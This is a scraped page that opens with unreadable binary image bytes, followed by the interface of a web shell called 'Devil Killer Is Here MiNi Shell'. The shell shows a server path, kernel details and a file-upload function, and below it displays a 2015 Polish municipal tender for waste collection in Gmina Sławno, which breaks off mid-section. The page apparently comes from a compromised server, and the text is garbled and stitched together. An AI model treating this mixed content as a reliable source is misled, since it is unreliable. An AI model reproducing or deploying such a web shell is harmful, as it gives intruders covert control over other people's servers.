JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151210/338384-N-2015.html

<p class="kh_header"><b>Sławno: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY SŁAWNO w 2016 roku</b><br>
<b>Numer ogłoszenia: 338384 - 2015; data zamieszczenia: 10.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sławno , ul. Marszałka Józefa Piłsudskiego 31, 26-332 Sławno, woj. łódzkie, tel. 44 755-18-50, faks 44 755-18-51.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugslawno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH Z TERENU GMINY SŁAWNO w 2016 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia  

1.1. Ogólny opis przedmiotu zamówienia.
1.1.1 Przedmiotem zamówienia jest odbiór i zagospodarowanie stałych odpadów komunalnych z terenu gminy Sławno w 2016 roku
Zakres zamówienia dotyczy posesji zamieszkałych.

W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować odpady komunalne ze wszystkich nieruchomości zamieszkałych na terenie Gminy Sławno,
 w sposób zapewniający osiągnięcie odpowiednich poziomów recyklingu, przygotowania 
do ponownego użycia i odzysku innymi metodami oraz ograniczenie masy odpadów ulegających biodegradacji, zgodnie z zapisami ustawy z dnia 13 września 1996 r. 
o utrzymaniu czystości i porządku w gminach ( Dz. U. z 2013 r. poz. 1399 ze  zm.), zapisami Planu gospodarki odpadami województwa łódzkiego 2012, przyjętego Uchwałą
nr XXVI/481/12 Sejmiku Województwa Łódzkiego w dniu 21 czerwca 2012 r. oraz przepisami Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno. 
Wykonawca zobowiązuje się do przekazywania odebranych od właścicieli nieruchomości selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 18  ustawy 
o odpadach (Dz. U. z 2013 r., poz. 21 ze zm.). Odebrane od właścicieli nieruchomości zmieszane odpady komunalne, odpady zielone oraz pozostałości z sortowania odpadów komunalnych przeznaczonych do składowania należy bezwzględnie przekazywać 
do instalacji do przetwarzania odpadów zgodnie z Uchwałą nr XXVI/482/12 Sejmiku Województwa Łódzkiego z dnia 21 czerwca 2012r. w sprawie wykonania Planu gospodarki odpadami województwa łódzkiego 2012. 
Baza magazynowo - transportowa oraz cały sprzęt Wykonawcy winien spełniać wszystkie wymagania wynikające z przepisów ustawy o utrzymaniu czystości i porządku w gminach oraz aktów wykonawczych wydanych na jej podstawie. 
1.2. Informacje ogólne mające wpływ na wycenę zamówienia:
1.2.1	W ramach zamówienia Wykonawca zobowiązany jest odbierać  i zagospodarować  odpady ze wszystkich nieruchomości zamieszkałych na terenie Gminy Sławno.
1.2.2	 Powierzchnia gminy:  128 km2. 

  Gmina Sławno położona jest we wschodniej części województwa łódzkiego, w odległości
80 km od Łodzi, 20 km od Tomaszowa Mazowieckiego oraz 10 km od Opoczna. 
Graniczy od północy z gminą Tomaszów Mazowiecki i Inowłódz, 
od wschodu z gminą Opoczno, od południa z gminami Białaczów i Paradyż, od zachodu 
z Mniszkowem. Przez obszar gminy przebiega droga krajowa Nr 12 relacji Piotrków Trybunalski-Radom, droga wojewódzka Nr 713 Opoczno-Łódź. W skład gminy wchodzą 
33 sołectwa, 34 miejscowości. 
W Gminie Sławno zameldowanych jest 7 721 osób - stan na 2015.11.17
Długość dróg na terenie Gminy Sławno - 122,486 km.


























GMINA SŁAWNO Z PODZIAŁEM NA SOŁECTWA








	GMINA SŁAWNO Z PODZIAŁEM NA SOŁECTWA



1.2.3. Dane dotyczące liczby  mieszkańców zameldowanych na pobyt stały i czasowy, liczby mieszkańców według złożonych deklaracji oraz  szacowanej  liczby  nieruchomości wg stanu na dzień 2015.11.17.
Lp.	Miejscowość	Liczba mieszkańców zameldowanych 	Liczba mieszkańców według złożonych deklaracji na 2014 rok	Szacunkowa liczba nieruchomości	w tym zabudowa wielorodzinna: 
1.	Antoninów	275	243	64	
2.	Antoniówka	373	311	83	
3.	Bratków 	227	197	52	
4.	Celestynów	83	73	27	
5.	Dąbrowa	91	80	24	
6.	Dąbrówka	170	131	37	
7.	Gawrony	674	566	150	
8.	Grążowice	221	214	58	
9.	Grudzeń  Kolonia	99	80	26	
10.	Grudzeń Las	209	171	60
	w tym 43 bloki
11.	Józefów 	76	68	19	
12.	Kamień	320	295	76	
13.	Kamilówka 	184	143	38	
14.	Kozenin	298	249	68	
15.	Kunice	407	350	98	
16.	Ludwinów	90	77	15	
17.	Olszewice	25	19	6	
18.	Olszowiec	327	269	71	
19.	Ostrożna 	179	156	36	
20.	Owadów	79	70	18	
21.	Popławy	133	112	34	
22.	Prymusowa Wola	418	372	107	
23.	Psary	275	228	65	
24.	Sepno - Radonia	49	42	17	
25.	Sławno 	448	392	113	
26.	Sławno Kolonia	142	119	33	
27.	Szadkowice	216	182	55	
28.	Tomaszówek 	201	189	56	
29.	Trojanów	92	90	23	
30.	Unewel	207	172	62	
31.	Wincentynów	177	164	35	
32.	Wygnanów	274	239	58	
33.	Zachorzów 	340	304	79	
34.	Zachorzów Kolonia	342	281	76	
		Razem	6648	1839	

Na terenie Gminy Sławno w miesiącach letnich ( średnio 3 miesiące) sezonowo zamieszkuje około 66 osób w 36 nieruchomościach.




1.2.4 Szacunkowa ilość odpadów.  
Ilość odebranych odpadów komunalnych w 2014 roku wynosiła łącznie ok. ~ 850 Mg ( w tym: selektywne ~  553 Mg; nieselektywne ~ 296 Mg).   

Wskazane ilości odebranych od 1 stycznia 2014 r. do 31 grudnia 2014 r. odpadów 
są podane jedynie pomocniczo w celu ułatwienia Wykonawcom wyceny zamówienia.  Podane ilości mogą ulec zmianie stosownie do rzeczywistych potrzeb zamawiającego 
z uwagi na m.in. zmianę liczby nieruchomości zamieszkałych (zmniejszenie lub zwiększenie) oraz zmianę liczby mieszkańców spowodowaną migracją ludności. 


1.3.	W ramach zamówienia Wykonawca zobowiązany jest odbierać                                       
 i zagospodarować następujące rodzaje odpadów:

1)	z zamieszkałych posesji: 
a)	niesegregowane (zmieszane) odpady komunalne o kodzie   20 03 01,
b)	segregowane odpady komunalne z podziałem na następujące frakcje:
- papier i tektura o kodzie 20 01 01, 
- tworzywa sztuczne o kodzie 20 01 39,
- szkło o kodzie: 20 01 02,
2)	z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK) pozostałe 
            odpady komunalne:
a)	przeterminowane leki i chemikalia o kodach 20 01 32, 20 03 99;
b)	zużyte baterie i akumulatory o kodzie 20 01 34;
c)	zużyty sprzęt elektryczny i elektroniczny o kodach 20 01 23, 20 01 35, 20 01 36;
d)	meble i inne odpady wielkogabarytowe o kodzie 20 03 07;
e)	zużyte opony o kodzie 16 01 03;
f)	         odpady budowlane i rozbiórkowe stanowiące odpady komunalne o kodach 17 01 01,      
            17 01 02, 17 01 03, 17 01 07.

3)	przeterminowane leki o kodzie 20 01 32 - wykaz punktów:
a)        ul. Jana Pawła II Nr 20 Sławno - przy aptece,
b)        ul. Marszałka Józefa Piłsudskiego Nr 31 Sławno - przy ośrodku zdrowia,
c)        Szadkowice - przy ośrodku zdrowia.
4)     zużyte baterie i akumulatory o kodzie 20 01 34 z następujących punktów:
a)     Zespół Szkół Samorządowych w Prymusowej Woli
b)    Publiczne Gimnazjum im. Kazimierza Wielkiego w Szadkowicach
c)    Publiczna Szkoła Podstawowa w Celestynowie
d)    Publiczna Szkoła Podstawowa  im. ks. Jana Twardowskiego w Kamieniu
e)    Publiczna Szkoła Podstawowa w Kozeninie
f)     Publiczna Szkoła Podstawowa im. W. i H. Ossowskich w Kunicach
g)    Publiczna Szkoła Podstawowa im. Jana Pawła II w Sławnie
h)    Publiczna Szkoła Podstawowa w Zachorzowie
i)     Urząd Gminy w Sławnie ul. Marszałka Józefa Piłsudskiego Nr 31

Odbiór w/w będzie odbywać się w dniu funkcjonowania PSZOK.

1.4. Zorganizowanie Punktu Selektywnego Zbierania Odpadów Komunalnych 
       (PSZOK).
1.4.1 W ramach zamówienia w miejscu wyznaczonym przez Zamawiającego (Zamawiający udostępni teren pod utworzenie PSZOK - gminne składowisko odpadów komunalnych 
w Sławnie Kol.) Wykonawca zorganizuje PSZOK w terminie 3 m-cy od podpisania umowy 
z Zamawiającym. 
1.4.2. Dopuszcza się odbiór odpadów do pojemników przeznaczonych na poszczególne grupy odpadów ustawionych na pojeździe, który będzie dostarczał i odbierał pojemniki 
w dniu w którym PSZOK będzie czynny.
1.4.3 PSZOK zostanie wyposażony przez Wykonawcę w odpowiednie  pojemniki tak aby zapewnić prawidłową segregację odpadów zgodnie z Uchwałą Nr XV/117/15 
Rady Gminy Sławno  z dnia 30 listopada 2015 r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych 
od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  Uchwałą 
Nr XXVII/190/12 Rady Gminy Sławno z dnia 28 grudnia 2012 r. w sprawie uchwalenia Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno. 
1.4.4. Wykonawca odpowiada za zachowanie na terenie PSZOK i wokół niego czystości                    i porządku.
1.4.5. PSZOK będzie odbierał odpady od mieszkańców  raz w miesiącu - wg harmonogramu w godz. 1000 - 1800 .

1.4.6. Do  PSZOK mieszkańcy mogą oddawać odpady zgodnie z Uchwalą Nr XV/117/15  Rady Gminy Sławno z dnia 30 listopada 2015 r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych 
od właścicieli nieruchomości  i zagospodarowania tych odpadów oraz  Uchwałą 
Nr XXVII/190/12 Rady Gminy Sławno z dnia 28 grudnia 2012 r. w sprawie uchwalenia Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno.
1.4.7.Obsługa PSZOK, w tym zapewnienie pracownika leży po stronie Wykonawcy.
1.5. Zbiórka odpadów wielkogabarytowych, mebli oraz sprzętu elektrycznego 
i elektronicznego.
1.5.1. Wykonawca w ramach zamówienia zobowiązany jest do zrealizowania wywozu odpadów wielkogabarytowych oraz sprzętu elektrycznego i elektronicznego bezpośrednio 
z nieruchomości zamieszkałych. 
Wywóz odpadów wielkogabarytowych w ramach umowy powinien być zrealizowany raz 
w roku. 
W roku  2016  - miesiąc wrzesień. 
1.5.2. Szczegółowe terminy zbiórki w poszczególnych miejscowościach oraz zasady zbiórki  powinny być każdorazowo poprzedzone akcją informacyjną, bądź ujęte w harmonogramie.
1.5.3. Zbiórka polega na : 
-  załadunku na środek transportu odpadów wystawionych przed nieruchomość zamieszkałą,
-  zagospodarowaniu odebranych odpadów,
- posprzątaniu miejsc, z których odbierane są wystawione odpady wielkogabarytowe,
    z odpadów wielkogabarytowych lub ich części i elementów tych odpadów
1.5.4. Zbiórka nie obejmuje odpadów powstałych w trakcie prowadzonej działalności przez podmioty gospodarcze

1.6.  Obowiązek zapewnienia pojemników
1.6.1. Na czas realizacji zamówienia Wykonawca zobowiązany będzie do zapewnienia posiadaczom nieruchomości zamieszkałych pojemników na odpady przystosowanych 
do opróżniania mechanicznego  o pojemnościach i właściwościach określonych w:
- Uchwale Nr XV/117/15 Rady Gminy Sławno z dnia 30 listopada 2015 r w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów - załącznik Nr 8 do siwz

- oraz  Uchwale Nr XXVII/190/12 Rady Gminy Sławno z dnia 28 grudnia 2012 r. w sprawie uchwalenia Regulaminu utrzymania porządku i czystości na terenie Gminy Sławno  - załącznik Nr 9  do siwz

na podstawie zawarcia z właścicielami nieruchomości umów wynajmu, dzierżawy lub innej formy dysponowania pojemnikami bez ponoszenia przez właścicieli nieruchomości z tego tytułu kosztów.
1.6.2.Przekazywane  pojemniki powinny być nowe lub używane, sprawne technicznie, czyste i estetyczne. Z nadrukiem logo firmy, wyposażone w kółka jezdne i klapę, przystosowane do mechanicznego opróżniania przez śmieciarki.
1.6.3 Jeżeli na terenie nieruchomości odpady  komunalne są zbierane i odbierane w sposób 
      selektywny to:
 nieruchomość będzie wyposażona w:
  a) 1 pojemnik o poj. 120 l na odpady zmieszane,
  b) 1 pojemnik o poj. 120 l na odpady segregowane kolor np. żółty- z przeznaczeniem na 
       makulaturę, tworzywa sztuczne, puszki, opakowania wielomateriałowe
   c) 1 pojemnik o poj. 120 l na odpady segregowane kolor np. niebieski -   z przeznaczeniem
        na    szkło 
1.6.4 Jeżeli na terenie nieruchomości odpady  komunalne są zbierane i odbierane w sposób 
      nieselektywny to:
 nieruchomość będzie wyposażona w:
1 pojemnik o poj. 120 l na odpady zmieszane,

1.6.4.1.Nieruchomości zamieszkałe na terenie Gminy Sławno 

Lp.
	
Nieruchomości zamieszkałe przez:	
Liczba *
1.	1 mieszkańca	208
2.	2 mieszkańców	423
3.	3 mieszkańców	270
4.	4 mieszkańców	339
5.	5 mieszkańców	344
6.	6 mieszkańców	152
7.	7 mieszkańców	57
8.	8 mieszkańców	26
9.	9 mieszkańców	13
10.	10 mieszkańców	5
11.	11 i więcej mieszkańców	2
	Razem:	1839
* - szacunkowa liczba nieruchomości


1.6.5. Punkty selektywnego zbierania odpadów komunalnych umiejscowione będą przy budynkach użyteczności publicznej między innymi:
a)    Zespół Szkół Samorządowych w Prymusowej Woli
b)    Publiczne Gimnazjum im. Kazimierza Wielkiego w Szadkowicach
c)    Publiczna Szkoła Podstawowa w Celestynowie
d)    Publiczna Szkoła Podstawowa  im. ks. Jana Twardowskiego w Kamieniu
e)    Publiczna Szkoła Podstawowa w Kozeninie
f)     Publiczna Szkoła Podstawowa im. W. i H. Ossowskich w Kunicach
g)    Publiczna Szkoła Podstawowa im. Jana Pawła II w Sławnie
h)    Publiczna Szkoła Podstawowa w Zachorzowie
i)     Urząd Gminy w Sławnie ul. Marszałka Józefa Piłsudskiego Nr 31
j)     Budynek OSP w Sławnie 

które należy wyposażyć w następujące pojemniki:
a) po 1 pojemniku na odpady segregowane - z przeznaczeniem na tworzywa sztuczne o poj. 120 l; b) po 1 pojemniku na odpady segregowane - z przeznaczeniem na szkło o poj. 120 l. 
1.6.6.Ilość posesji w których odpady gromadzone będą w sposób nieselektywny może wynosić ok. ~0,5 % wszystkich posesji. 
1.6.7. Koszt wyposażenia w pojemniki należy wkalkulować w oferowaną cenę ryczałtową zamówienia.
1.6.8.Pojemniki będą przekazywane przez Wykonawcę mieszkańcom na zasadach określonych w Uchwale Nr XV/117/15 Rady Gminy Sławno z dnia 30 listopada 2015 r. 
w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów. 
1.6.9. Pojemniki będą przez Wykonawcę dostarczane mieszkańcom na posesje w terminie:
a) 7 dni od podpisania umowy w przypadku pierwszego wyposażenia nieruchomości 
      w pojemniki.
b) w terminie 2 dni - od przyjęcia przez zamawiającego zlecenia - w przypadku wyposażenia 
    nieruchomości w dodatkowe pojemniki
W terminie 14 dni od daty podpisania umowy  wykonawca zobowiązany jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach wraz z  informacją o posesjach, do których pojemników nie dostarczono 
(z podaniem przyczyny niedostarczenia).
1.6.10. Wykonawca wyposaży PSZOK w pojemniki w ilości i o rodzajach wynikających 
z potrzeb  z uwzględnieniem Uchwał Rady Gminy stanowiących załącznik nr 8 i 9 do SIWZ.
1.6.11. Wykonawca wyposaży punkty, w których odbywać się będzie zbiórka przeterminowanych leków oraz punkty, w których odbywać się będzie zbiórka zużytych baterii i akumulatorów w odpowiednie pojemniki z uwzględnieniem potrzeb występujących w danych punktach. Odbiór jak z PSZOK - raz w miesiącu
1.6.12. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników z winy wykonawcy, wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny koszt.

1.7. Częstotliwość i zasady odbioru i wywozu odpadów.
1.7.1. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował z częstotliwością - niesegregowane odpady komunalne oraz segregowane odpady komunalne - odbiór 
raz w miesiącu zgodnie z  zasadami  określonymi w Uchwale Nr XV/117/15 Rady Gminy Sławno z dnia 30 listopada 2015 r. w sprawie określenia szczegółowego sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów.
1.7.2. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował 
w poszczególnych miejscowościach zawsze w ten sam dzień roboczy tygodnia. 
W sytuacji, gdy dzień wywozu jest ustawowo dniem wolnym od pracy (święto), wywóz odpadów nastąpi w pierwszym dniu roboczym po dniu wolnym.
1.7.3. Wykonawca zobowiązany jest do opracowania i dostarczenia Zamawiającemu przed podpisaniem umowy harmonogramu wywozu odpadów z poszczególnych miejscowości. 

1.7.4. Harmonogram odbierania odpadów komunalnych z uwzględnieniem poszczególnych rodzajów odpadów obejmujący okres od 1 stycznia 2016 r. do 31 grudnia 2016 r. powinien być opracowany przez Wykonawcę i zaakceptowany przez Zamawiającego. Wykonawca zobowiązany jest do dostarczenia w formie papierowej do wszystkich nieruchomości zamieszkałych harmonogram odbierania odpadów w terminie 7 dni od daty podpisania umowy.

1.7.5 Wykonawca zobowiązany jest wprowadzić zmiany w harmonogramie w terminie 
nie dłuższym od zgłoszenia w formie pisemnej zapotrzebowania przez Zamawiającego, przekazać Zamawiającemu zmieniony harmonogram  do akceptacji, a po zaakceptowaniu niezwłocznie dostarczyć harmonogram właścicielom nieruchomości w formie papierowej. 

1.7.6 Wykonawca zobowiązany jest do dystrybucji również innych dokumentów związanych ze zbiórką odpadów komunalnych ( ulotki) dostarczonych od Zamawiającego o ile nie wymagają one potwierdzenia odbioru. 

1.7.7. Podczas realizacji umowy niedopuszczalne jest mieszanie selektywnie zebranych odpadów komunalnych z odpadami niesegregowanymi.
1.7.8. Wykonawca zobowiązany jest do  sukcesywnego wywozu odpadów z PSZOK tak aby zapewnić  możliwość ciągłego dostarczania odpadów przez mieszkańców.
1.7.9. Wykonawca zobowiązany jest do opróżniania punktów selektywnego zbierania odpadów komunalnych  raz w miesiącu. 
1.7.10. Wykonawca zobowiązany będzie odbierać  pojemniki z przeterminowanymi  lekami, zużytymi bateriami oraz akumulatorami małogabarytowymi raz w miesiącu. 
1.7.11. Odbiór odpadów będzie następował  z pojemników wystawionych przez właściciela nieruchomości na zewnątrz posesji, do drogi dojazdowej lub ustawionych w pergolach śmietnikowych, do których zapewniony jest swobodny dojazd.
1.7.12. W razie awarii pojazdu Wykonawca zobowiązany jest zapewnić pojazd zastępczy 
o zbliżonych parametrach.
1.8. Kontrola  obowiązku segregowania odpadów.
1.8.1. Wykonawca zobowiązany jest do monitorowania ciążącego na właścicielu   nieruchomości obowiązku segregowania odpadów komunalnych.
1.8.2. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się 
z obowiązku segregacji odpadów, wykonawca odbiera odpady jako zmieszane. 
1.8.3. W takim przypadku wykonawca umieszcza na pokrywie pojemnika znacznik 
(np. samoprzylepna kartka) informujący właściciela nieruchomości o otrzymaniu ostrzeżenia za nie przestrzeganie obowiązku segregowania odpadów.                 
1.8.4. O zaistniałej sytuacji wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem  lub pisemnie, w terminie do 3 dni roboczych. Do zawiadomienia wykonawca dołącza   protokół określający: dzień wywozu, miejscowość, ulicę i numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu zobowiązany jest dołączyć również dokumentację fotograficzną z datownikiem. 

1.9. Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia:


1)Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku 
    w gminach i Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów 
    sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz 
    realizacji zadań z zakresu gospodarowania odpadami komunalnymi
2)	Innych informacji na temat odbioru, unieszkodliwiania i segregacji odpadów, jeżeli 
w trakcie realizacji zamówienia Zamawiający nałoży taki obowiązek. Obowiązek ten dotyczyć może jedynie informacji, w posiadaniu których będzie wykonawca.

3)	Jako załączniki do faktury kwartalnej wykonawca załączy karty przekazania 
do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych (RIPOK) zmieszanych odpadów komunalnych - uwzględniające datę, kod, rodzaj, wagę oraz odpadów selektywnie zebranych - zgodnie z hierarchią postępowania z odpadami. Karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu gminy Sławno.

4)	Raportów kwartalnych zawierających określenie  ilości i rodzajów przekazywanych  pojemników w danym kwartale wraz z uaktualnionym raportem o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach (załącznik 
do faktury).



1.10. Pozostałe obowiązki Wykonawcy:
1.10.1. Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do dostarczenia dokumentów zapewniających  osiągnięcie odpowiednich poziomów recyklingu odbieranych odpadów komunalnych zgodnie z art. 3b i 3c ustawy o utrzymaniu czystości i porządku 
w gminach oraz rozporządzeniami wykonawczymi.
1.10.2. Prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami prawa obowiązującymi w tym zakresie. 
1.10.3. Przekazywanie odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do właściwej Regionalnej Instalacji  Przetwarzania Odpadów Komunalnych lub, w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi regionu, zgodnie z uchwałą Nr XXVI/482/12 Sejmiku Województwa Łódzkiego z dnia 21 czerwca 2012 r. w sprawie wykonania  Planu gospodarki odpadami województwa łódzkiego 2012
i uchwałą Nr XXXV/687/13 Sejmiku Województwa Łódzkiego z dnia 26 kwietnia 2013 r. 
w sprawie zmiany uchwały Nr XXVI/482/12 Sejmiku Województwa Łódzkiego 
z dnia 21 czerwca 2012 r. w sprawie wykonania  Planu gospodarki odpadami województwa łódzkiego 2012.
1.10.4. Przekazywanie selektywne zebranych odpadów komunalnych do instalacji odzysku                i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa w ustawie z dnia 14 grudnia 2012 o odpadach (Dz. U. z 2013 r. poz. 21 ze  zm.),
